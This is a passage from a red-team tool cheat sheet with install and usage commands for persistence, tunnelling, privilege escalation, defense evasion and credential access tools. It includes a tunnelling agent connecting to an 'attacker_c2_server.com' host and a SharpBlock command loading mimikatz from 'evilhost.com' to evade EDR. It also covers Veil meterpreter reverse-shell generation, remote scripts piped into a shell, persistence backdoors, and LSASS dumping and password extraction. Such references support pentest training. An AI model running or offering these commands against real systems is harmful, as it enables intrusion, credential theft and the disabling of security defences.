1881 | - Go to "NuGet Package Manager" --> "Package Sources"
1882 | - Add a package source with the URL "https://api.nuget.org/v3/index.json"
1883 | - Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019.
1884 | - `Install-Package Costura.Fody -Version 3.3.3`
1885 | - Install the TaskScheduler package
1886 | - `Install-Package TaskScheduler -Version 2.8.11`
1887 | - You can now build the project yourself!
1888 |
1889 | **Usage:**
1890 |
1891 | A full list of usage examples can be found [here](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).
1892 |
1893 | ```
1894 | #KeePass
1895 | SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add
1896 |
1897 | #Registry
1898 | SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
1899 |
1900 | #Scheduled Task Backdoor
1901 | SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
1902 |
1903 | #Startup Folder
1904 | SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
1905 | ```
1906 |
1907 | 
1908 |
1909 | ### [🔙](#tool-list)[ligolo-ng](https://github.com/nicocha30/ligolo-ng)
1910 |
1911 | Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
1912 |
1913 | Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using [Gvisor](https://gvisor.dev/).
1914 |
1915 | When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
1916 |
1917 | **Install: (Download)**
1918 |
1919 | Precompiled binaries (Windows/Linux/macOS) are available on the [Release page](https://github.com/nicocha30/ligolo-ng/releases).
1920 |
1921 | **Install: (Build)**
1922 |
1923 | *Building ligolo-ng (Go >= 1.17 is required):*
1924 |
1925 | ```bash
1926 | go build -o agent cmd/agent/main.go
1927 | go build -o proxy cmd/proxy/main.go
1928 |
1929 | # Build for Windows
1930 | GOOS=windows go build -o agent.exe cmd/agent/main.go
1931 | GOOS=windows go build -o proxy.exe cmd/proxy/main.go
1932 | ```
1933 |
1934 | **Setup: (Linux)**
1935 |
1936 | ```bash
1937 | sudo ip tuntap add user [your_username] mode tun ligolo
1938 | sudo ip link set ligolo up
1939 | ```
1940 |
1941 | **Setup: (Windows)**
1942 |
1943 | You need to download the [Wintun](https://www.wintun.net/) driver (used by [WireGuard](https://www.wireguard.com/)) and place the `wintun.dll` in the same folder as Ligolo (make sure you use the right architecture).
1944 |
1945 | **Setup: (Proxy server)**
1946 |
1947 | ```bash
1948 | ./proxy -h # Help options
1949 | ./proxy -autocert # Automatically request LetsEncrypt certificates
1950 | ```
1951 |
1952 | **Usage:**
1953 |
1954 | *Start the agent on your target (victim) computer (no privileges are required!):*
1955 |
1956 | ```bash
1957 | ./agent -connect attacker_c2_server.com:11601
1958 | ```
1959 |
1960 | A session should appear on the proxy server.
1961 |
1962 | ```
1963 | INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
1964 | ```
1965 |
1966 | Use the session command to select the agent.
1967 |
1968 | ```
1969 | ligolo-ng » session
1970 | ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
1971 | ```
1972 |
1973 | Full usage information can be found [here](https://github.com/nicocha30/ligolo-ng#using-ligolo-ng).
1974 |
1975 | 
1976 |
1977 | *Image used from https://github.com/nicocha30/ligolo-ng#demo*
1978 |
1979 | Privilege Escalation
1980 | ====================
1981 |
1982 | ### [🔙](#tool-list)[LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
1983 |
1984 | LinPEAS is a nice verbose privilege escalation for finding local privesc routes on Linux endpoints.
1985 |
1986 | **Install + Usage:**
1987 |
1988 | ```bash
1989 | curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh
1990 | ```
1991 |
1992 | 
1993 |
1994 | ### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
1995 |
1996 | WinPEAS is a nice verbose privilege escalation for finding local privesc routes on Windows endpoints.
1997 |
1998 | **Install + Usage:**
1999 |
2000 | ```bash
2001 | $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
2002 | ```
2003 |
2004 | 
2005 |
2006 | ### [🔙](#tool-list)[linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration)
2007 |
2008 | Linux smart enumeration is another good, less verbose, linux privesc tool for Linux.
2009 |
2010 | **Install + Usage:**
2011 |
2012 | ```bash
2013 | curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
2014 | ```
2015 |
2016 | 
2017 |
2018 | ### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)
2019 |
2020 | Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).
2021 |
2022 | Certify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks.
2023 |
2024 | **Key features of Certify:**
2025 |
2026 | - Certificate creation
2027 | - Certificate signing
2028 | - Certificate import
2029 | - Certificate trust modification
2030 |
2031 | **Install: (Compile)**
2032 |
2033 | Certify is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the Certify project [.sln](https://github.com/GhostPack/Certify), choose "Release", and build.
2034 |
2035 | **Install: (Running Certify Through PowerShell)**
2036 |
2037 | If you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly:
2038 |
2039 | ```bash
2040 | [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt
2041 | ```
2042 |
2043 | Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string):
2044 |
2045 | ```
2046 | $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))
2047 | ```
2048 |
2049 | The Main() method and any arguments can then be invoked as follows:
2050 |
2051 | ```
2052 | [Certify.Program]::Main("find /vulnerable".Split())
2053 | ```
2054 |
2055 | Full compile instructions can be found [here](https://github.com/GhostPack/Certify#compile-instructions).
2056 |
2057 | **Usage:**
2058 |
2059 | ```bash
2060 | # See if there are any vulnerable templates
2061 | Certify.exe find /vulnerable
2062 |
2063 | # Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal
2064 | Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin
2065 | ```
2066 |
2067 | Full example walkthrough can be found [here](https://github.com/GhostPack/Certify#example-walkthrough).
2068 |
2069 | 
2070 |
2071 | ### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)
2072 |
2073 | Get-GPPPassword is a PowerShell script part of the PowerSploit toolkit, it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP).
2074 |
2075 | Get-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user.
2076 |
2077 | **Install:**
2078 |
2079 | Follow the PowerSploit [installation instructions](https://github.com/A-poc/RedTeam-Tools#powersploit) from this tool sheet.
2080 |
2081 | ```bash
2082 | powershell.exe -ep bypass
2083 | Import-Module PowerSploit
2084 | ```
2085 |
2086 | **Usage:**
2087 |
2088 | ```bash
2089 | # Get all passwords with additional information
2090 | Get-GPPPassword
2091 |
2092 | # Get list of all passwords
2093 | Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
2094 | ```
2095 |
2096 | 
2097 |
2098 | ### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)
2099 |
2100 | PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
2101 |
2102 | *Supports:*
2103 |
2104 | - MS10-015 : User Mode to Ring (KiTrap0D)
2105 | - MS10-092 : Task Scheduler
2106 | - MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
2107 | - MS13-081 : TrackPopupMenuEx Win32k NULL Page
2108 | - MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
2109 | - MS15-051 : ClientCopyImage Win32k
2110 | - MS15-078 : Font Driver Buffer Overflow
2111 | - MS16-016 : 'mrxdav.sys' WebDAV
2112 | - MS16-032 : Secondary Logon Handle
2113 | - MS16-034 : Windows Kernel-Mode Drivers EoP
2114 | - MS16-135 : Win32k Elevation of Privilege
2115 | - CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc
2116 |
2117 | **Install: (PowerShell)**
2118 |
2119 | ```bash
2120 | # Git install
2121 | git clone https://github.com/rasta-mouse/Sherlock
2122 |
2123 | # Load powershell module
2124 | Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1
2125 | ```
2126 |
2127 | **Usage: (PowerShell)**
2128 |
2129 | ```bash
2130 | # Run all functions
2131 | Find-AllVulns
2132 |
2133 | # Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)
2134 | Find-MS14058
2135 | ```
2136 |
2137 | 
2138 |
2139 | *Image used from https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/*
2140 |
2141 | ### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)
2142 |
2143 | Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.
2144 |
2145 | Great for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system.
2146 |
2147 | **Install:**
2148 |
2149 | Using [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the [Watson project .sln](https://github.com/rasta-mouse/Watson), choose "Release", and build.
2150 |
2151 | **Usage:**
2152 |
2153 | ```bash
2154 | # Run all checks
2155 | Watson.exe
2156 | ```
2157 |
2158 | 
2159 |
2160 | *Image text used from https://github.com/rasta-mouse/Watson#usage*
2161 |
2162 | ### [🔙](#tool-list)[ImpulsiveDLLHijack](https://github.com/knight0x07/ImpulsiveDLLHijack)
2163 |
2164 | A C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries.
2165 |
2166 | The discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's.
2167 |
2168 | **Install:**
2169 |
2170 | - **Procmon.exe** -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
2171 | - **Custom Confirmatory DLL's** :
2172 | - These are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path
2173 | - Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!)
2174 | - 32Bit dll name should be: maldll32.dll
2175 | - 64Bit dll name should be: maldll64.dll
2176 | - Install NuGet Package:** PeNet** -> https://www.nuget.org/packages/PeNet/ (Prereq while compiling the ImpulsiveDLLHijack project)
2177 |
2178 | **Note: i & ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.**
2179 |
2180 | - **Build and Setup Information:**
2181 |
2182 | - **ImpulsiveDLLHijack**
2183 |
2184 | - Clone the repository in Visual Studio
2185 | - Once project is loaded in Visual Studio go to "Project" --> "Manage NuGet packages" --> Browse for packages and install "PeNet" -> https://www.nuget.org/packages/PeNet/
2186 | - Build the project!
2187 | - The ImpulsiveDLLHijack.exe will be inside the bin directory.
2188 |
2189 | - **And for Confirmatory DLL's:**
2190 |
2191 | - Clone the repository in Visual Studio
2192 | - Build the project with x86 and x64
2193 | - Rename x86 release as maldll32.dll and x64 release as maldll64.dll
2194 |
2195 | - **Setup:** Copy the Confirmatory DLL's (maldll32 & maldll64) in the ImpulsiveDLLHijack.exe directory & then execute ImpulsiveDLLHijack.exe :))
2196 |
2197 | *Install instructions from https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites*
2198 |
2199 | **Usage:**
2200 |
2201 | ```bash
2202 | # Help
2203 | ImpulsiveDLLHijack.exe -h
2204 |
2205 | # Look for vulnerabilities in an executable
2206 | ImpulsiveDLLHijack.exe -path BINARY_PATH
2207 | ```
2208 |
2209 | Usage examples can be found [here](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).
2210 |
2211 | 
2212 |
2213 | *Image used from https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples*
2214 |
2215 | ### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)
2216 |
2217 | A C# tool to dump all sorts of goodies from AD FS.
2218 |
2219 | Created by Doug Bienstock [@doughsec](https://twitter.com/doughsec) while at Mandiant FireEye.
2220 |
2221 | This tool is designed to be run in conjunction with ADFSpoof. ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof.
2222 |
2223 | **Requirements:**
2224 |
2225 | - ADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. Only the AD FS service account has the permissions needed to access the configuration database. Not even a DA can access this.
2226 | - ADFSDump assumes that the service is configured to use the Windows Internal Database (WID). Although it would be trivial to support an external SQL server, this feature does not exist right now.
2227 | - ADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe.
2228 |
2229 | **Install: (Compile)**
2230 |
2231 | ADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose "Release", and build.
2232 |
2233 | **Usage: (Flags)**
2234 |
2235 | ```bash
2236 | # The Active Directory domain to target. Defaults to the current domain.
2237 | /domain:
2238 |
2239 | # The Domain Controller to target. Defaults to the current DC.
2240 | /server:
2241 |
2242 | # Switch. Toggle to disable outputting the DKM key.
2243 | /nokey
2244 |
2245 | # (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
2246 | /database
2247 | ```
2248 |
2249 | [Blog - Exploring the Golden SAML Attack Against ADFS](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs)
2250 |
2251 | 
2252 |
2253 | *Image used from https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs*
2254 |
2255 | Defense Evasion
2256 | ====================
2257 |
2258 | ### [🔙](#tool-list)[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)
2259 |
2260 | A PowerShell v2.0+ compatible PowerShell command and script obfuscator. If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts.
2261 |
2262 | **Install:**
2263 |
2264 | ```bash
2265 | git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
2266 | ```
2267 |
2268 | **Usage:**
2269 |
2270 | ```bash
2271 | ./Invoke-Obfuscation
2272 | ```
2273 |
2274 | 
2275 |
2276 | ### [🔙](#tool-list)[Veil](https://github.com/Veil-Framework/Veil)
2277 |
2278 | Veil is a tool for generating metasploit payloads that bypass common anti-virus solutions.
2279 |
2280 | It can be used to generate obfuscated shellcode, see the official [veil framework blog](https://www.veil-framework.com/) for more info.
2281 |
2282 | **Install: (Kali)**
2283 |
2284 | ```bash
2285 | apt -y install veil
2286 | /usr/share/veil/config/setup.sh --force --silent
2287 | ```
2288 |
2289 | **Install: (Git)**
2290 |
2291 | ```bash
2292 | sudo apt-get -y install git
2293 | git clone https://github.com/Veil-Framework/Veil.git
2294 | cd Veil/
2295 | ./config/setup.sh --force --silent
2296 | ```
2297 |
2298 | **Usage:**
2299 |
2300 | ```bash
2301 | # List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)
2302 | ./Veil.py -t Ordnance --list-payloads
2303 |
2304 | # List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)
2305 | ./Veil.py -t Ordnance --list-encoders
2306 |
2307 | # Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234
2308 | ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234
2309 |
2310 | # List all payloads (–list-payloads) for the tool Evasion (-t Evasion)
2311 | ./Veil.py -t Evasion --list-payloads
2312 |
2313 | # Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris
2314 | ./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris
2315 | ```
2316 |
2317 | Veil creators wrote a nice [blog post](https://www.veil-framework.com/veil-command-line-usage/) explaining further ordnance and evasion command line usage.
2318 |
2319 | 
2320 |
2321 | ### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)
2322 |
2323 | A method of bypassing EDR's active projection DLL's by preventing entry point execution.
2324 |
2325 | **Features:**
2326 |
2327 | - Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
2328 | - Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
2329 | - Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike).
2330 | - Implanted process is hidden to help evade scanners looking for hollowed processes.
2331 | - Command line args are spoofed and implanted after process creation using stealthy EDR detection method.
2332 | - Patchless ETW bypass.
2333 | - Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space.
2334 |
2335 | **Install:**
2336 |
2337 | Use [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) to compile the SharpBlock binary.
2338 |
2339 | Open the SharpBlock [project .sln](https://github.com/CCob/SharpBlock), choose "Release", and build.
2340 |
2341 | **Usage:**
2342 |
2343 | ```bash
2344 | # Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
2345 | SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
2346 |
2347 | # Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
2348 | execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
2349 | upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi
2350 | ```
2351 |
2352 | Nice PenTestPartners blog post [here](https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/).
2353 |
2354 | 
2355 |
2356 | *Image used from https://youtu.be/0W9wkamknfM*
2357 |
2358 | ### [🔙](#tool-list)[Alcatraz](https://github.com/weak1337/Alcatraz)
2359 |
2360 | Alcatraz is a GUI x64 binary obfuscator that is able to obfuscate various different pe files including:
2361 |
2362 | - .exe
2363 | - .dll
2364 | - .sys
2365 |
2366 | Some supported obfuscation features include:
2367 |
2368 | - Obfuscation of immediate moves
2369 | - Control flow flattening
2370 | - ADD mutation
2371 | - Entry-point obfuscation
2372 | - Lea obfuscation
2373 |
2374 | **Install: (Requirements)**
2375 |
2376 | Install: https://vcpkg.io/en/getting-started.html
2377 |
2378 | ```bash
2379 | vcpkg.exe install asmjit:x64-windows
2380 | vcpkg.exe install zydis:x64-windows
2381 | ```
2382 |
2383 | **Usage:**
2384 |
2385 | Using the GUI to obfuscate a binary:
2386 |
2387 | 1. Load a binary by clicking `file` in the top left corner.
2388 | 2. Add functions by expanding the `Functions` tree. (You can search by putting in the name in the searchbar at the top)
2389 | 3. Hit `compile` (**Note:** *Obfuscating lots of functions might take some seconds*)
2390 |
2391 | 
2392 |
2393 | *Image used from https://github.com/weak1337/Alcatraz*
2394 |
2395 | ### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)
2396 |
2397 | Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL).
2398 |
2399 | Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files.
2400 |
2401 | In doing so, Mangle helps loaders evade on-disk and in-memory scanners.
2402 |
2403 | **Install:**
2404 |
2405 | The first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:
2406 |
2407 | ```
2408 | go get github.com/Binject/debug/pe
2409 | ```
2410 |
2411 | Then build it
2412 |
2413 | ```
2414 | git clone https://github.com/optiv/Mangle
2415 | cd Mangle
2416 | go build Mangle.go
2417 | ```
2418 |
2419 | **Usage:**
2420 |
2421 | ```bash
2422 | -C string
2423 | Path to the file containing the certificate you want to clone
2424 | -I string
2425 | Path to the orginal file
2426 | -M Edit the PE file to strip out Go indicators
2427 | -O string
2428 | The new file name
2429 | -S int
2430 | How many MBs to increase the file by
2431 | ```
2432 |
2433 | Full usage information can be found [here](https://github.com/optiv/Mangle#usage).
2434 |
2435 | 
2436 |
2437 | *Image used from https://github.com/optiv/Mangle*
2438 |
2439 | ### [🔙](#tool-list)[AMSI Fail](http://amsi.fail/)
2440 |
2441 | AMSI.fail is a great website that can be used to generate obfuscated PowerShell snippets that break or disable AMSI for the current process.
2442 |
2443 | The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.
2444 |
2445 | Nice f-secure blog explaining AMSI [here](https://blog.f-secure.com/hunting-for-amsi-bypasses/).
2446 |
2447 | 
2448 |
2449 | *Image used from http://amsi.fail/*
2450 |
2451 | Credential Access
2452 | ====================
2453 |
2454 | ### [🔙](#tool-list)[Mimikatz](https://github.com/gentilkiwi/mimikatz)
2455 |
2456 | Great tool for gaining access to hashed and cleartext passwords on a victims endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds.
2457 |
2458 | **Install:**
2459 |
2460 | 1. Download the [mimikatz_trunk.7z](https://github.com/gentilkiwi/mimikatz/releases) file.
2461 | 2. Once downloaded, the `mimikatz.exe` binary is in the `x64` folder.
2462 |
2463 | **Usage:**
2464 |
2465 | ```bash
2466 | .\mimikatz.exe
2467 | privilege::debug
2468 | ```
2469 |
2470 | 
2471 |
2472 | ### [🔙](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne)
2473 |
2474 | Nice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.
2475 |
2476 | **Install: (Binary)**
2477 |
2478 | You can install the standalone binary from [here](https://github.com/AlessandroZ/LaZagne/releases/).
2479 |
2480 | **Usage:**
2481 |
2482 | ```bash
2483 | # Launch all modes
2484 | .\laZagne.exe all
2485 |
2486 | # Launch only a specific module
2487 | .\laZagne.exe browsers
2488 |
2489 | # Launch only a specific software script
2490 | .\laZagne.exe browsers -firefox
2491 | ```
2492 |
2493 | 
2494 |
2495 |
2496 | ### [🔙](#tool-list)[hashcat](https://github.com/hashcat/hashcat)
2497 |
2498 | Tool for cracking password hashes. Supports a large list of hashing algorithms (Full list can be found [here](https://hashcat.net/wiki/doku.php?id=example_hashes)).
2499 |
2500 | **Install: Binary**
2501 |
2502 | You can install the standalone binary from [here](https://hashcat.net/hashcat/).
2503 |
2504 | **Usage:**
2505 |
2506 | ```bash
2507 | .\hashcat.exe --help
2508 | ```
2509 |
2510 | Nice hashcat command [cheatsheet](https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/).
2511 |
2512 | 
2513 |
2514 | ### [🔙](#tool-list)[John the Ripper](https://github.com/openwall/john)
2515 |
2516 | Another password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.
2517 |
2518 | **Install:**
2519 |
2520 | ```bash
2521 | sudo apt-get install john -y
2522 | ```
2523 |
2524 | **Usage:**
2525 |
2526 | ```bash
2527 | john
2528 | ```
2529 |
2530 | 
2531 |
2532 | ### [🔙](#tool-list)[SCOMDecrypt](https://github.com/nccgroup/SCOMDecrypt)
2533 |
2534 | This tool is designed to retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.
2535 |
2536 | NCC blog post - ['SCOMplicated? – Decrypting SCOM “RunAs” credentials'](https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/)
2537 |
2538 | **Pre-requisites:**
2539 |
2540 | To run the tool you will require administrative privileges on the SCOM server. You will also need to ensure that you have read access to the following registry key:
2541 |
2542 | ```
2543 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins
2544 | ```
2545 |
2546 | You can check manually that you can see the database by gathering the connection details from the following keys:
2547 |
2548 | ```
2549 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
2550 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName
2551 | ```
2552 |
2553 | **Install: (PS1)**
2554 |
2555 | ```
2556 | git clone https://github.com/nccgroup/SCOMDecrypt
2557 | cd .\SCOMDecrypt\SCOMDecrypt\
2558 | . .\Invoke-SCOMDecrypt.ps1
2559 | ```
2560 |
2561 | **Install: (Compile)**
2562 |
2563 | Using [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) you can compile the SCOMDecrypt binary.
2564 |
2565 | Open the SCOMDecrypt [project .sln](https://github.com/nccgroup/SCOMDecrypt), choose "Release", and build.
2566 |
2567 | **Usage:**
2568 |
2569 | ```bash
2570 | # PS1
2571 | Invoke-SCOMDecrypt
2572 |
2573 | # Compiled C# binary
2574 | .\SCOMDecrypt.exe
2575 | ```
2576 |
2577 | 
2578 |
2579 | *Image text used from https://github.com/nccgroup/SCOMDecrypt*
2580 |
2581 | ### [🔙](#tool-list)[nanodump](https://github.com/helpsystems/nanodump)
2582 |
2583 | The LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs.
2584 |
2585 | Creating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.
2586 |
2587 | This allows for the creation of a minidump of the LSASS process.
2588 |
2589 | **Install:**
2590 |
2591 | ```bash
2592 | git clone https://github.com/helpsystems/nanodump.git
2593 | ```
2594 |
2595 | **Install: (Linux with MinGW)**
2596 |
2597 | ```bash
2598 | make -f Makefile.mingw
2599 | ```
2600 |
2601 | **Install: (Windows with MSVC)**
2602 |
2603 | ```bash
2604 | nmake -f Makefile.msvc
2605 | ```
2606 |
2607 | **Install: (CobaltStrike only)**
2608 |
2609 | Import the `NanoDump.cna` script on Cobalt Strike.
2610 |
2611 | Full installation information can be found [here](https://github.com/helpsystems/nanodump).
2612 |
2613 | **Usage:**
2614 |
2615 | ```bash
2616 | # Run
2617 | nanodump.x64.exe
2618 |
2619 | # Leverage the Silent Process Exit technique
2620 | nanodump --silent-process-exit C:\Windows\Temp\
2621 |
2622 | # Leverage the Shtinkering technique
2623 | nanodump --shtinkering
2624 | ```
2625 |
2626 | Full usage information can be found [here](https://github.com/helpsystems/nanodump#1-usage).
2627 |
2628 | 
2629 |
2630 | *Image used from https://github.com/helpsystems/nanodump*
2631 |
2632 | ### [🔙](#tool-list)[eviltree](https://github.com/t3l3machus/eviltree)
2633 |
2634 | A standalone python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:
2635 |
2636 | - While searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders, provides a significant advantage.
2637 | - `tree` is an amazing tool for analyzing directory structures. It's really handy to have a standalone alternative of the command for post-exploitation enumeration as it is not pre-installed on every linux distro and is kind of limited on Windows (compared to the UNIX version).
2638 |
2639 | **Install:**
2640 |
2641 | ```bash
2642 | git clone https://github.com/t3l3machus/eviltree
2643 | ```
2644 |
2645 | **Usage:**
2646 |
2647 | ```bash
2648 | # Running a regex that essentially matches strings similar to: password = something against /var/www
2649 | python3 eviltree.py -r /var/www -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -v
2650 |
2651 | # Using comma separated keywords instead of regex
2652 | python3 eviltree.py -r C:\Users\USERNAME -k passw,admin,account,login,user -L 3 -v
2653 | ```
2654 |
2655 | 
2656 |
2657 | *Image used from https://github.com/t3l3machus/eviltree*
2658 |
2659 | ### [🔙](#tool-list)[SeeYouCM-Thief](https://github.com/trustedsec/SeeYouCM-Thief)
2660 |
2661 | Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials.
2662 |
2663 | Will also optionally enumerate active directory users from the UDS API.
2664 |
2665 | [Blog - Exploiting common misconfigurations in cisco phone systems](https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/)
2666 |
2667 | **Install:**
2668 |
2669 | ```bash
2670 | git clone https://github.com/trustedsec/SeeYouCM-Thief
2671 | python3 -m pip install -r requirements.txt
2672 | ```
2673 |
2674 | **Usage:**
2675 |
2676 | ```bash
2677 | # Enumerate Active Directory users from the UDS api on the CUCM
2678 | ./thief.py -H --userenum
2679 |
2680 | # Without specifying a phone IP address the script will attempt to download every config in the listing.
2681 | ./thief.py -H [--verbose]
2682 |
2683 | # Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.
2684 | ./thief.py --phone [--verbose]
2685 |
2686 | # Specify a subnet to scan with reverse lookups.
2687 | ./thief.py --subnet [--verbose]
2688 | ```
2689 |
2690 | 
2691 |
2692 | *Image used from https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/*
2693 |
2694 | ### [🔙](#tool-list)[MailSniper](https://github.com/dafthack/MailSniper)
2695 |
